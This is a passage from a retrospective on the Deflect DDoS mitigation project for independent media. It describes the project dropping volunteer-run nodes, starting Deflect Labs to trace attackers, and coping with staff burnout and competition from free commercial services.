This increased network latency and could not scale during a DDoS attack; we were worsening the performance of our infrastructure instead of improving it. Another important factor driving our deliberations was the low cost of server infrastructure: by renting our machines from commercial providers and using their competitive pricing to our advantage, we managed to keep infrastructure costs below 5% of our overall monthly expenditure, so monetary support for a worldwide infrastructure of Deflect servers was not significant compared with the resources required to service the network. By concentrating development efforts on encrypting and delivering website content from our distributed cache and on performance load balancing across a voluntary node infrastructure, we held back work on improving network management and task automation. This meant that the bar for providing technical support to the network was set quite high, excluding the participation of technically minded volunteers protected by Deflect.
After several months of further testing, deliberation and consultation with our funders, we decided to abandon the initiative to include voluntary network resources, in favour of continuing the existing mitigation platform and improving its services for clients. As attack mitigation became routine and Deflect successfully defended its clients from relentless DDoS offensives, the team began to look at the impunity currently enjoyed by those launching the attacks. Beginning with the case of a Vietnamese independent media website targeted by bots originating from a state-regulated and controlled Vietnamese ISP, we understood that a story could be extracted from the forensic trail of an attack, and that it may contain evidence of motivation, method and provenance. If this story could be told, it would give huge advocacy power to the target and begin to peel away at the anonymity enjoyed by the organizers. The cost of attacking Deflectees would rise as the exposure and media attention around the event upended the attackers' goals.
We began to develop an infrastructure that would capture a statistically relevant segment of an attack. Data analysis was achieved through machine-led technology for profiling and classifying malicious actors on our network, visualization tools for human-led investigation, and cooperation with peer organizations to trace activity across our respective networks. This effort became Deflect Labs, and in its first twelve months we published three detailed reports covering a series of incidents targeting websites protected by Deflect, exposing the attackers' methodology and profiling their networks. Doing some open source intelligence work in collaboration with website staff, we identified a story in each attack, exposing the possible motivations and identity of the attackers. Following the publication and media attention created by these reports, attacks against one of the websites diminished significantly and ceased altogether against the other.
Challenges
Many difficulties and problems could be expected when running a high-impact, 24/7 security service for several million daily readers. Fatigue, lack of time for developing new features, round-the-clock emergency coverage and numerous high-stress situations led to burnout and staff turnover. The resources invested in the Distributed Deflect model set back development of the project's other ambitions considerably. At around the same time as Deflect was gaining popularity, free mitigation offerings from Cloudflare and Google were introduced, in tandem with outreach campaigns targeting independent media and human rights organizations. This gave civil society organizations seeking website protection more options, but made it harder for us to attract the expected number of websites. We started a campaign to articulate the differences in our approaches to client eligibility, respect for privacy and clear terms of service, trying a variety of communications and outreach strategies. We were nonetheless disappointed not to receive more support from within our community of peers, as open source solutions and data ownership did not figure highly among the criteria NGOs and media used when selecting mitigation options.
… we carry on
Deflect continues to operate and innovate, gradually growing and solidifying. Our ongoing ambitions include offering our clients broader hosting options and developing standards and systems for responsible data sharing among like-minded ISPs and mitigation providers. Look out for pleasant graphical user interfaces in our control panels and documentation platforms. We are also prototyping several approaches to generating revenue in order to sustain the project for the foreseeable future. The goal is to get better without losing track of what we came here to do in the first place. As always, we are here to support our clients' missions and their right to free expression, and we are heartened by their feedback and testimonials.